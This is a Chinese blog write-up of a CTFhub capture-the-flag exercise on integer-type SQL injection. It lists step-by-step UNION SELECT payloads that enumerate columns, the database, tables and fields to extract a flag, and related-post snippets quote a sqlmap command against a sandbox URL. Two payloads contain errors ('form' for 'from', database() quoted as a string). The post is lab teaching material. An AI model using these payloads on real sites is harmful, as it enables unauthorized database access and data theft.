CTFhub——SQL整数型注入

已于 2023-09-19 23:28:29 修改
阅读量147 收藏
点赞数
文章标签: 数据库 网络安全
于 2023-09-19 23:27:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69896901/article/details/133050841
版权

CTFhub——SQL整数型注入

拿到网站后,由于知道是整数型,所以不考虑闭合。

1.确定字段数
1 order by x

当x=3时页面只返回sql语句,说明该表有两个字段
在这里插入图片描述

2.确定回显位置

由于查询结果被前面的id=1覆盖,不能显示出来,所以我们让id=-1,使前面字段返回结果为空,以便显示出后面的结果

-1 union select 1,2

在这里插入图片描述

3.获取数据库名

知道了回显位置,我们可以在回显位置输入database()查看数据库名

-1 union select database(),2

在这里插入图片描述

4.获取表名

我们可以使用内置的一些数据库信息来查询当前表名

如果有不知道information_schema、table_name、table_schema、column_name的小伙伴可以参考一下这张图,可以很清!晰的看出它们之间的从属关系
在这里插入图片描述

-1 union select table_name,2 form information_schema.tables where table_schema='database()'

在这里插入图片描述

5.获取字段名
-1 union select column_name,2 from information_schema.columns where table_name='flag' and table_schema='database()'

在这里插入图片描述
可以发现字段名也为flag

6.查看该字段下内容
-1 union select concat(flag),2 from flag

在这里插入图片描述
经过这样几步我们就成功的获取了flag,是不是轻松加愉快呢
其实无论是整数型还是字符型,只要页面有输入、有输出,那我们都可以用联合查询的这固定几步解出flag!

狗卷726
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFHUB - SQL注入-整数型和字符型注入
m0_64180167的博客
11-28 2295
对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的。,在管理员不知情的情况下实现非法操作,以此来实现欺骗。执行非授权的任意查询,从而进一步得到相应的数据信息。在学习SQL注入时要了解一些MYSQL语法。
CTFHub | 整数型注入
尼泊罗河伯的博客
10-25 2485
根据题目描述输入 1 进行测试,发现此题可能存在 SQL 注入漏洞。那么使用' and 1 = 1 ‘和' and 1 = 2’进行判断,此题存在 SQL 整数型漏洞注入。那么第一步先判断字段数量,然后检查数据库位置,知道数据库位置后查看数据库版本和数据库名。接着查看一下全部数据库名,并查看这些数据库的表名,发现一个表名为 flag 比较可疑。查看这个表名的全部字段后接着查看表中的数据得到此题 flag 。
CTFHUB-SQL注入-整数型注入
weixin_68416970的博客
06-07 562
根据题目描述输入 1 进行测试,发现此题可能存在 SQL 注入漏洞。使用 id=1' and 1 = 1 和 id=1' and 1 = 2’进行判断,此题存在 SQL 整数型漏洞注入。然后第一步先判断字段数量,然后查看数据库名,接着查看全部数据库名,查看这些数据库的表名,发现一个表名为 flag。查看这个表的全部字段后接着查看表中的数据得到此题 flag。
CTFHUB——整数型SQL注入
陈艺秋的博客
01-14 1255
整型SQL注入
CTFCTFHub------web-SQL注入-整数型注入
从零开始的网安生活
07-23 388
文章目录SQL注入整数型注入 SQL注入 整数型注入 1.打开链接根据提示输入1 1.先检查数据库有无注入点 python sqlmap.py -u http://challenge-7a209e58efdf655a.sandbox.ctfhub.com:10080/?id=1 得到 GET parameter 'id' is vulnerable. ...
啊D——SQL注入工具
12-01
啊D注入工具
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
PHP——SQL注入测试靶场
05-27
【PHP——SQL注入测试靶场】是一个用于学习和实践SQL注入漏洞的安全平台,它通过PHP编程语言构建,目的是帮助开发者和网络安全爱好者理解SQL注入的工作原理,以及如何防范这种常见的Web安全威胁。SQL注入是一种攻击...
打造网站的坚盾——SQL注入防范专题——SQL注入防范之完善网站程序.pdf
09-19
打造网站的坚盾——SQL注入防范专题——SQL注入防范之完善网站程序.pdf
SQL注入——mssql注入
01-19
可以在 SQL Server 中执行任何活动。 serveradmin  可以设置服务器范围的配置选项,关闭服务器。 setupadmin 可以管理链接服务器和启动过程,并执行某些系统存储过程(sp_...
PostgreSQL的逻辑架构
最新发布
weixin_41992498的博客
07-18 106
一、PostgreSql的逻辑架构:所有者:
【星海随笔】vCenter Server 和主机管理。
weixin_41997073的博客
07-16 195
1.方法:删除页面信息,然后断连这个受管主机,断开受管主机的连接不会将其从 vCenter Server 中移除,而只是临时挂起 vCenter Server 执行的所有监控活动。2.方法:在分布式存储中找到该虚拟设备的存储盘,文件里找到相关的vmdk磁盘文件,点击注册虚拟机。当资料不匹配时候,可以删除展示页面,孤立的设备的 匹配位置的信息。断开后,然后重新连接,既可以重新识别受监管的主机。数据库在Vserver中展示的是一个数据库的资料,应该是client的资料。1.确定为资料不匹配导致的展示问题。
Linux系统的用户组管理和权限以及创建用户
Johaden的博客
07-14 986
因此,我们可以根据每个用户的角色、职位和需求,为他们分配相应的权限,以确保服务器的安全性和有效管理。sudo(superuser do)是在类Unix操作系统中(包括Linux和macOS)常用的一个命令,它允许经过授权的用户以系统管理员(通常是root用户)的权限来运行程序或命令。2.在登陆Ubuntu时,会填写全名、用户名、密码等,所创建的这个用户就是默认用户,其中全名可以类似为一个昵称,用户名为主机名(较正式,不可随意更改)。超级用户可以执行系统上的所有命令,包括系统配置、文件访问和用户管理等。
Spring框架之DI依赖注入
G81948577的博客
07-18 567
我们在下面构建spring的过程中体会依赖注入;从上面的图中我们知道,在ssm框架中服务层(server)无法直接操作数据库,持久层(dao)是直接操作数据库进行数据处理的,但是我们如果在服务层有一个持久层的对象,然后我们在服务层通过对象去调用持久层的方法就可以操作数据库了。@OverrideSystem.out.println("持久层,你好");UserServiceImpl类中的代码如下@Override。
MySQL 其他
w1834938347的博客
07-15 690
SQL执行顺序from确定查询的表,jion连接表、on对from进行过滤,where进行条件过滤,group by和having进行分组后过滤,select进行指定的列,distinct去重,排序,限制行数定表过滤-分组过滤-选列过滤。
深入 Dify 源码,洞察 Dify RAG 核心机制
易迟的专栏
07-17 1108
之前深入源码对 Dify 的完整流程进行了解读,基本上梳理了 Dify 的实现流程与主要组件。但是在实际部署之后,发现 Dify 现有的 RAG 检索效果没有那么理想。因此个人结合前端页面,配置信息与实现流程,深入查看了私有化部署的 Dify 的技术细节。将核心内容整理在这边,方便大家根据实际的业务场景调整 Dify 知识库的配置,或者根据需要进行二次开发调优。
day04:Redis和店铺营业状态设置
m0_69266818的博客
07-15 835
介绍了Redis命令和用java操作redis还有营业额状态接口的书写
Apache AGE的WITH子句
oscube的博客
07-17 245
使用 WITH,您可以在将输出传递给以下查询部分之前对其进行操作。这些操作可以是结果集中条目的形状和/或数量。WITH 也可以像 RETURN 一样,使用别名对引入结果的表达式进行别名,使用别名作为绑定名称。WITH 还用于将图的读取与图的更新分开。查询的每个部分必须是只读的或只写的。从写入子句转到读取子句时,可以使用可选的 WITH 进行此操作。
ctfhub sql注入
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值